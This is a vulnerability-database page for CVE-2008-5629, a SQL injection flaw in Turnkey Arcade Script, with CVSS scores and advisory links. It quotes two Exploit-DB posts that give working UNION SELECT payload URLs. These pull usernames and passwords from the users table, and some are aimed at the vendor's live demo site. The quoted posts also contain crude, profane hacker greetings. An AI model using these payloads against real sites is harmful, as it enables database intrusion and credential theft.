CVE-2008-5629
published 2008-12-17CVE-2008-5629: SQL injection vulnerability in index.php in Turnkey Arcade Script allows remote attackers to execute arbitrary SQL commands via the id parameter in a play…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.98%
57.8th percentile
SQL injection vulnerability in index.php in Turnkey Arcade Script allows remote attackers to execute arbitrary SQL commands via the id parameter in a play action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| turnkeyarcade | turnkey_arcade_script | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2xmq-j92f-3mrq: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-17
CVE-2008-5629 [HIGH] CWE-89 GHSA-2xmq-j92f-3mrq: SQL injection vulnerability in index
SQL injection vulnerability in index.php in Turnkey Arcade Script allows remote attackers to execute arbitrary SQL commands via the id parameter in a play action.
GHSA
GHSA-7qmq-m34q-87h4: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-3973 [HIGH] CWE-89 GHSA-7qmq-m34q-87h4: SQL injection vulnerability in index
SQL injection vulnerability in index.php in Turnkey Arcade Script allows remote attackers to execute arbitrary SQL commands via the id parameter in a browse action, a different vector than CVE-2008-5629.
No detection rules found.
Exploit-DB
Turnkey Arcade Script - SQL Injection (2)
exploitdb·2009-08-25
CVE-2009-3973 Turnkey Arcade Script - SQL Injection (2)
Turnkey Arcade Script - SQL Injection (2)
---
## Hackteach.OrG ##
/ ___ )( __ )/ ___ )
\/ ) || ( ) |\/ ) |
/ )| | / | / )
/ / | (/ /) | / /
/ / | / | | / /
/ (_/\| (__) | / (_/\
(_______/(_______)(_______/
[»] ~ Note : Hacker R0x Lamerz Sux !
[»] Arcad site Script ]
[»] Gr44tz to: [ All member Hackteach.org/cc - Str0ke - sp3x ]
[»] Fuck To : [ Anti-trust << Big Big Big Lamer << ]
########################################################################
===[ Exploit SQL ]===
[»] Path/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
[»] L1v3 d3m0 : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
Author: Red-D3v1L <-
#######################################
Exploit-DB
Turnkey Arcade Script - SQL Injection (1)
exploitdb·2008-11-27
CVE-2009-3973 Turnkey Arcade Script - SQL Injection (1)
Turnkey Arcade Script - SQL Injection (1)
---
----------------Mor0ccan Nightmares----------------
Script: Turnkey Arcade Script-
Site: http://www.turnkeyarcade.com-
Author: The_5p3ctrum -
Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-
---
Ex:
---
http://localhost/index.php?action=play&id=[sql]
http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users
exploit:
http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users
Demo:
http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users
Greetz:
Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...
# milw0rm.com
No writeups or analysis indexed.
http://secunia.com/advisories/32890http://www.securityfocus.com/bid/32511https://exchange.xforce.ibmcloud.com/vulnerabilities/46935https://www.exploit-db.com/exploits/7256http://secunia.com/advisories/32890http://www.securityfocus.com/bid/32511https://exchange.xforce.ibmcloud.com/vulnerabilities/46935https://www.exploit-db.com/exploits/7256
2008-12-17
Published